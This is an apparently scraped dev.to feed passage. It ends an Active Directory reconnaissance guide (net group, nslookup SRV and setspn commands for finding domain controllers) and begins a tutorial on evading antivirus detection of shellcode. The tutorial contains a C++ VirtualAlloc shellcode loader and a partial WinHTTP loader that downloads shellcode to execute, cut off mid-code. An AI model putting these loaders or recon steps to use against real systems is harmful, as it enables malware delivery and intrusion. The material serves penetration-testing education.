&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7w8wfk9guat9fqx8g4lv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7w8wfk9guat9fqx8g4lv.png" alt="Figure 6: Output from the Invoke-UserEvenHunter function in PowerView, identifying logged-on domain users." width="672" height="331"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 6: Output from the Invoke-UserEvenHunter function in PowerView, identifying logged-on domain users.
  &lt;p&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Locating Domain Controllers
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Command Line Identification
&lt;/h3&gt;

&lt;p&gt;A Domain Controller can be identified by querying the relevant domain group with the command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net group "Domain controllers" /Domain        //View Domain Controllers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxopac9lio7knaw5tbqig.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxopac9lio7knaw5tbqig.png" alt="Figure 7: Results of the 'net group' command, showing the Domain Controller computer account." width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 7: Results of the 'net group' command, showing the Domain Controller computer account.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Alternatively, the &lt;code&gt;net time&lt;/code&gt; command can be utilised to reveal the Domain Controller serving the logon server role:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net time /do
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5vktm1hsf94hu8k0wizs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5vktm1hsf94hu8k0wizs.png" alt="Figure 8: Output showing the domain time, which implicitly reveals the Domain Controller's hostname." width="800" height="151"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 8: Output showing the domain time, which implicitly reveals the Domain Controller's hostname.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  DNS Record Enumeration
&lt;/h3&gt;

&lt;p&gt;Should the local machine's configured DNS server be a domain-integrated DNS server, querying specific service location (SRV) records can identify Domain Controllers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nslookup -type=all _ldap._tcp.dc._msdcs.tubai.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhm4n8evf145g9ioxfw0t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhm4n8evf145g9ioxfw0t.png" alt="Figure 9: Nslookup query results showing SRV records that point to Domain Controllers." width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 9: Nslookup query results showing SRV records that point to Domain Controllers.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Port Probing
&lt;/h3&gt;

&lt;p&gt;Domain Controllers typically expose a characteristic set of ports. Port &lt;code&gt;389&lt;/code&gt; is the default port for the Lightweight Directory Access Protocol (LDAP), port &lt;code&gt;636&lt;/code&gt; is for LDAP over SSL/TLS (LDAPS), and port &lt;code&gt;53&lt;/code&gt; is the standard port for the Domain Name System (DNS) service. A targeted scan for hosts within the internal network range that have these specific ports open can reveal potential Domain Controllers.&lt;/p&gt;

&lt;p&gt;A direct probe of the identified Domain Controller's IP address on these key ports confirms its role.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lgxdkj5znzcr64y1i9u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lgxdkj5znzcr64y1i9u.png" alt="Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller." width="547" height="388"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  SPN Scanning
&lt;/h3&gt;

&lt;p&gt;Service Principal Name (SPN) scanning is a stealthier alternative to conventional TCP or UDP port scanning, as it utilises standard Kerberos authentication requests. Most Windows installations include the native &lt;code&gt;setspn.exe&lt;/code&gt; utility, which does not require administrative rights to perform queries.&lt;/p&gt;

&lt;p&gt;The following command, executed from a domain-joined machine, can identify Domain Controllers by their registered SPNs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;setspn -T tubai.com -Q */*
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within the scan results, Domain Controllers can be distinguished by distinguished names (DNs) containing the string &lt;code&gt;OU=Domain Controllers&lt;/code&gt;, such as &lt;code&gt;CN=AD-SERVER,OU=Domain Controllers,DC=tubai,DC=com&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqyhl7pnyyzc3j43pyodx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqyhl7pnyyzc3j43pyodx.png" alt="Figure 11: The output of an SPN scan, with the Domain Controller's service account highlighted." width="799" height="488"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 11: The output of an SPN scan, with the Domain Controller's service account highlighted.
  &lt;p&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;Numerous methods exist for identifying Domain Administrators and Domain Controllers; the techniques described herein represent only the most frequently employed. During routine internal network penetration tests, it is a cardinal principle to prioritise techniques that generate minimal detectable activity.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>domain</category>
      <category>penetration</category>
      <category>network</category>
    </item>
    <item>
      <title>A Summary of Shellcode Evasion Techniques</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 06:51:10 +0000</pubDate>
      <link>https://dev.to/excalibra/a-summary-of-shellcode-evasion-techniques-4350</link>
      <guid>https://dev.to/excalibra/a-summary-of-shellcode-evasion-techniques-4350</guid>
      <description>&lt;h1&gt;
  
  
  Shellcode Evasion Techniques: A Practical Guide
&lt;/h1&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;I aim to elucidate shellcode evasion techniques in an accessible, straightforward manner, using plain language and practical examples. It is my hope that fellow penetration testers with a background in web application security will also be able to implement these evasion methods effectively.&lt;/p&gt;

&lt;p&gt;In this article, I have categorised shellcode evasion techniques into two primary classifications: &lt;strong&gt;"Separation"&lt;/strong&gt; and &lt;strong&gt;"Obfuscation"&lt;/strong&gt;. These techniques target distinct detection methodologies employed by security solutions, namely signature-based detection, behavioural analysis, and cloud-based heuristic scanning.&lt;/p&gt;

&lt;p&gt;Please note that my expertise is limited; should any errors be identified, I welcome corrections and constructive feedback.&lt;/p&gt;




&lt;h2&gt;
  
  
  0x01 Shellcode "Separation" Evasion
&lt;/h2&gt;

&lt;p&gt;Let us first examine the conventional C/C++ loading methods commonly utilised for shellcode execution.&lt;/p&gt;

&lt;p&gt;Typical approaches include function pointer execution, inline assembly instructions, pseudo-instructions, and similar techniques.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftackmyaw1bzdqvnjefw7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftackmyaw1bzdqvnjefw7.png" alt="Figure 1: Traditional shellcode loading example showing inline shellcode within the executable." width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 1: Traditional shellcode loading example showing inline shellcode within the executable.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;However, this approach—where the shellcode resides within the same executable file—renders the resulting binary highly susceptible to detection by antivirus solutions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnhcgctx08jvrn8ima24z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnhcgctx08jvrn8ima24z.png" alt="Figure 2: AV detection results for executables with embedded shellcode" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 2: AV detection results for executables with embedded shellcode
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Consequently, the prevailing philosophy behind separation-based evasion is to decouple the shellcode from the loader program itself.&lt;/p&gt;

&lt;p&gt;Let us examine a common separation-based loading implementation using C++ as an illustrative example:&lt;/p&gt;

&lt;p&gt;A typical implementation employs memory allocation functions such as &lt;code&gt;VirtualAlloc&lt;/code&gt; to execute shellcode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"windows.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="c1"&gt;// ... shellcode truncated for brevity ...&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x63\x61\x6c\x63\x2e\x65\x78\x65\x00&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;memcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)())&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;)();&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq25w2lo7sqtbbwq4pjzl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq25w2lo7sqtbbwq4pjzl.png" alt="Figure 3: Standard shellcode execution flow using VirtualAlloc" width="800" height="631"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 3: Standard shellcode execution flow using VirtualAlloc
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;To achieve true separation, we can retrieve the shellcode from an external source rather than embedding it statically within the binary. This can be accomplished through various means, such as reading the shellcode from a local text file or downloading it from a remote server.&lt;/p&gt;

&lt;p&gt;The following example demonstrates retrieving shellcode via an HTTP request using the WinHTTP API, storing it in a memory buffer, and subsequently allocating executable memory for execution:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;iostream&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;windows.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;winhttp.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
&lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwDownloaded&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;LPSTR&lt;/span&gt; &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;HINTERNET&lt;/span&gt;  &lt;span class="n"&gt;hSession&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;hConnect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;hRequest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;BOOL&lt;/span&gt;  &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;hSession&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpOpen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;L"User-Agent"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_ACCESS_TYPE_DEFAULT_PROXY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_PROXY_NAME&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_PROXY_BYPASS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;hConnect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpConnect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"127.0.0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;INTERNET_DEFAULT_HTTP_PORT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;hRequest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpOpenRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"POST"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"qing.txt"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"HTTP/1.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_REFERER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_DEFAULT_ACCEPT_TYPES&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;LPCWSTR&lt;/span&gt; &lt;span class="n"&gt;header&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;L"Content-type: application/x-www-form-urlencoded/r/n"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;SIZE_T&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lstrlenW&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;WinHttpAddRequestHeaders&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_ADDREQ_FLAG_ADD&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"name=host&amp;amp;sign=xx11sad"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ss&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_str&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpSendRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const_cast&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ss&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bResults&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpReceiveResponse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bResults&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;do&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Check for available data.&lt;/span&gt;
            &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;WinHttpQueryDataAvailable&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
